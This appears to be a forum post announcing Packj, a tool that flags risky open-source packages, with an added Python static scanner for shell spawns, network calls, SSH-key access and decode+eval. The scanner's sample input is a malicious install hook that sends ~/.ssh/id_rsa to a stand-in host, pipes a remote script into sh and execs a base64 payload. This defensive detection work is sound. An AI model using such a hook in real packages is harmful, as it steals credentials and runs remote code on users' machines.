by ashishbijlani
843 days ago
I’ve been building an open-source tool Packj [1] to detect publicly malicious, abandoned, typo-squatting, and other "risky" PyPI/NPM/Ruby/PHP/Maven/Rust packages. It carries out static/dynamic/metadata analysis and scans for 40+ attributes such as spawning of shell, use of SSH keys, network communication, use of decode+eval, etc. to flag risky packages.

1. https://github.com/ossillate-inc/packj
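As an added example (not Packj's code, and not taken from the post), here is a toy static scanner that flags four of the attribute families the post lists (shell spawn, network use, SSH-key access, decode+eval) by walking the AST of a Python module and resolving import aliases so `import subprocess as sp; sp.Popen(...)` is still caught. The attribute labels, the indicator lists and the `setup.py`-style sample input are all assumptions constructed for this example; Packj's own labels, lists and heuristics are not reproduced here.

```python
"""Toy static scanner for "risky" attributes in Python package source.

Added example, not Packj's code. Attribute labels and indicator lists below
are assumptions for illustration; the sample input is constructed inline.
"""
import ast
import re
from dataclasses import dataclass

SHELL_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_call", "subprocess.check_output",
}
NETWORK_ROOTS = {"socket", "urllib", "http", "requests", "ftplib", "smtplib"}
DECODE_CALLS = {
    "base64.b64decode", "base64.b32decode", "base64.b16decode",
    "codecs.decode", "zlib.decompress", "bytes.fromhex",
}
EVAL_CALLS = {"eval", "exec", "compile"}
SSH_KEY_RE = re.compile(r"\.ssh/|id_rsa|id_ed25519|id_ecdsa|authorized_keys")


@dataclass(frozen=True)
class Finding:
    attribute: str   # "shell_spawn", "network", "ssh_key" or "decode_eval"
    lineno: int
    detail: str


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class RiskScanner(ast.NodeVisitor):
    """Collects findings while walking one module's AST (imports must
    precede the calls they alias; late or dynamic imports are missed)."""

    def __init__(self):
        self.aliases = {}   # local binding -> fully qualified name
        self.findings = []

    def _add(self, attribute, node, detail):
        self.findings.append(Finding(attribute, node.lineno, detail))

    def _resolve(self, name):
        """Map 'sp.Popen' back to 'subprocess.Popen' via recorded imports."""
        if name is None:
            return None
        head, _, rest = name.partition(".")
        full = self.aliases.get(head, head)
        return f"{full}.{rest}" if rest else full

    def _note_module(self, module, node):
        if module.partition(".")[0] in NETWORK_ROOTS:
            self._add("network", node, f"imports {module}")

    def visit_Import(self, node):
        for a in node.names:
            # 'import a.b' binds 'a'; 'import a.b as x' binds 'x' -> 'a.b'
            local = a.asname or a.name.partition(".")[0]
            self.aliases[local] = a.name if a.asname else local
            self._note_module(a.name, node)

    def visit_ImportFrom(self, node):
        module = node.module or ""          # relative imports have module=None
        for a in node.names:
            self.aliases[a.asname or a.name] = f"{module}.{a.name}"
        self._note_module(module, node)

    def visit_Call(self, node):
        name = self._resolve(_dotted_name(node.func))
        if name in SHELL_CALLS:
            self._add("shell_spawn", node, name)
        elif name and name.partition(".")[0] in NETWORK_ROOTS:
            self._add("network", node, name)
        elif name in EVAL_CALLS:
            # decode+eval: eval/exec whose argument is produced by a decoder
            args = node.args + [kw.value for kw in node.keywords]
            inner = [self._resolve(_dotted_name(c.func))
                     for arg in args for c in ast.walk(arg)
                     if isinstance(c, ast.Call)]
            decoders = [n for n in inner if n in DECODE_CALLS]
            if decoders:
                self._add("decode_eval", node, f"{name}({decoders[0]}(...))")
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str) and SSH_KEY_RE.search(node.value):
            self._add("ssh_key", node, repr(node.value))


def scan_source(source):
    """Return the list of Findings for one module's source text."""
    scanner = RiskScanner()
    scanner.visit(ast.parse(source))
    return scanner.findings


def summarize(findings):
    """Count findings per attribute, e.g. {'network': 2, 'shell_spawn': 1}."""
    counts = {}
    for f in findings:
        counts[f.attribute] = counts.get(f.attribute, 0) + 1
    return counts


# Constructed sample of a malicious-looking install hook (not a real package).
SAMPLE_SETUP_PY = '''
import base64, os
import subprocess as sp
from urllib.request import urlopen

def _post_install():
    key = open(os.path.expanduser("~/.ssh/id_rsa")).read()
    urlopen("http://example.invalid/collect", data=key.encode())
    sp.Popen(["sh", "-c", "curl -s http://example.invalid/x | sh"])
    exec(base64.b64decode("cHJpbnQoJ2hpJyk=").decode())
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_SETUP_PY):
        print(f"line {f.lineno:>3}  {f.attribute:<12} {f.detail}")
```

The scanner never executes the package, so it cannot see behaviour hidden behind string-built imports or C extensions, which is why a tool like the one described combines static checks with dynamic and metadata analysis; the per-attribute counts returned by `summarize` are the kind of signal a policy layer would then turn into a verdict.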